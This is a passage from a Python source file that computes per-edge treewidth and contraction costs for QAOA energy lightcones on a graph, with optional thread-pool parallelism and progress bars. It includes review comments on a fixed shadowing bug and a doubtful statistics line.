            pbar.update()  # original never advanced the bar
            pbar.set_postfix(current_tw=tw,
                             subgraph_nodes=subgraph.number_of_nodes())
    return tw, mem, flop
def _twidth_parallel_unit(args):
    """Pool worker: treewidth of one (circuit, subgraph) pair.

    `args` is (circ_graph, ordering_algo, tamaki_time, max_tw). Raises
    ValueError when a truthy `max_tw` is exceeded, aborting the pool map.
    """
    circ_graph, ordering_algo, tamaki_time, max_tw = args
    circuit, subgraph = circ_graph
    tw = get_tw(circuit, ordering_algo=ordering_algo, tamaki_time=tamaki_time)
    if max_tw:
        if tw > max_tw:
            print(f'Encountered treewidth of {tw}, which is larger {max_tw}')
            raise ValueError(f'Encountered treewidth of {tw}, which is larger {max_tw}')
    return tw


def qaoa_energy_tw_from_graph(G, p, max_time=0, max_tw=0, ordering_algo='greedy',
                              print_stats=False, tamaki_time=15, n_processes=1,
                              composer_type='default'):
    """Treewidth of every edge lightcone of G for a depth-`p` QAOA ansatz.

    Returns the list of per-edge treewidths; with n_processes > 1 the work is
    fanned out over a thread pool (multiprocessing.dummy).
    """
    lightcone_gen = qaoa_energy_lightcone_iterator(G, p, max_time=max_time,
                                                   composer_type=composer_type)
    arggen = zip(lightcone_gen, repeat(ordering_algo), repeat(tamaki_time),
                 repeat(max_tw))
    if n_processes > 1:
        print('n_processes', n_processes)
        # BUGFIX: the pool variable used to be named `p`, shadowing the QAOA
        # depth parameter inside this branch
        with Pool(n_processes) as pool:
            twidths = list(tqdm(pool.imap(_twidth_parallel_unit, arggen),
                                total=G.number_of_edges()))
    else:
        twidths = []
        with tqdm(total=G.number_of_edges(), desc='Edge iteration') as pbar:
            for args in arggen:
                _circuit, subgraph = args[0]
                tw = _twidth_parallel_unit(args)
                pbar.update()
                pbar.set_postfix(current_tw=tw,
                                 subgraph_nodes=subgraph.number_of_nodes())
                twidths.append(tw)
    if print_stats:
        print(f'med={np.median(twidths)} mean={round(np.mean(twidths), 2)} max={np.max(twidths)}')
    return twidths


def qaoa_energy_cost_params_from_graph(G, p, max_time=0, max_tw=0,
                                       ordering_algo='greedy',
                                       print_stats=False):
    """Per-edge (treewidth, memory, flops) tuples for G's energy lightcones.

    Stops early when a truthy `max_tw` is exceeded (that edge's cost is not
    recorded). Returns the list of cost tuples collected so far.
    """
    costs = []
    with tqdm(total=G.number_of_edges(), desc='Edge iteration') as pbar:
        for circuit, subgraph in qaoa_energy_lightcone_iterator(G, p, max_time=max_time):
            c = get_cost_params(circuit, ordering_algo=ordering_algo)
            if max_tw:
                if c[0] > max_tw:
                    print(f'Encountered treewidth of {c[0]}, which is larger {max_tw}')
                    break
            costs.append(c)
            pbar.update(1)
            pbar.set_postfix(current_costs=c,
                             subgraph_nodes=subgraph.number_of_nodes())
    if print_stats:
        # NOTE(review): costs is a list of 3-tuples, so these stats are over
        # the flattened array — presumably intended for treewidths; confirm
        print(f'med={np.median(costs)} mean={round(np.mean(costs), 2)} max={np.max(costs)}')
    return costs